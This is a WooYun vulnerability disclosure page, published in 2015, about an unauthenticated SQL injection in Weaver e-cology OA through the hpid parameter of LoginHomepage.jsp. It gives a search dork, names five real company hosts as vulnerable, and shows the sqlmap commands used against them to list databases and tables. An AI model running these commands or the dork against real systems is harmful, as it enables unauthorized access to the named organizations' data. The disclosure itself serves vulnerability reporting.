当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078802

漏洞标题:泛微e-cology系统又一sql注入(无需登录)

相关厂商:泛微软件

漏洞作者: D_in

提交时间:2014-10-10 12:30

修复时间:2015-01-08 12:30

公开时间:2015-01-08 12:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

泛微e-cology系统又一注入,而且不需要登录,官网成功注入,橡果国际和大东方百货躺枪,裤带去搜了下,好像有人提交了类似的,不知是否相同

详细说明:

通用建站程序介绍 

1、建站程序类型:JSP+MSSql,JSP+oracle 
2、漏洞类型:SQL注入 
3、缺陷文件:homepage/LoginHomepage.jsp 
4、注入参数:hpid 
5、涉及版本:未知 
7、危害程度:高危 
8、涉及厂商:泛微软件 
9、厂商网站:http://www.weaver.com.cn/ 
10、安装量:未知 
11、是否拥有源代码分析:暂无 
12、关键字:inurl:homepage/LoginHomepage.jsp
13、是否默认配置:未知 14、枚举案例


http://group.e-cology.cn/homepage/LoginHomepage.jsp?hpid=52&isfromportal=1   官网
http://km.chinadrtv.com/homepage/LoginHomepage.jsp?hpid=21&isfromportal=1&templateId=42&null&templateId=42&null  橡果国际
http://oa.eastall.com:8081/homepage/LoginHomepage.jsp?hpid=62&isfromportal=1&templateId=41&null&templateId=41&null  大东方百货
http://oa.ankai.com/homepage/LoginHomepage.jsp?hpid=81&opt=privew
http://oa.funglian.com/homepage/LoginHomepage.jsp?hpid=83&isfromportal=1&templateId=4&null&templateId=4&null    联想控股成员企业丰联

漏洞证明:

第一例:官网

sqlmap -u "http://group.e-cology.cn/homepage/LoginHomepage.jsp?hpid=52&isfromportal=1" --current-db


官网1.png


第二例:大东方百货

sqlmap -u "http://oa.eastall.com:8081/homepage/LoginHomepage.jsp?hpid=62&isfromportal=1&templateId=41&null&templateId=41&null" --current-db


大东方百货.png


sqlmap -u "http://oa.eastall.com:8081/homepage/LoginHomepage.jsp?hpid=62&isfromportal=1&templateId=41&null&templateId=41&null" --tables -D "ECOLOGY"


大东方百货2.png


第三例:联想旗下丰联

sqlmap -u "http://oa.funglian.com/homepage/LoginHomepage.jsp?hpid=83&isfromportal=1&templateId=4&null&templateId=4&null" --current-db


丰联.png


第四例:橡果国际

sqlmap -u "http://km.chinadrtv.com/homepage/LoginHomepage.jsp?hpid=21" --current-db


橡果.png

修复方案:

版权声明:转载请注明来源 D_in@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝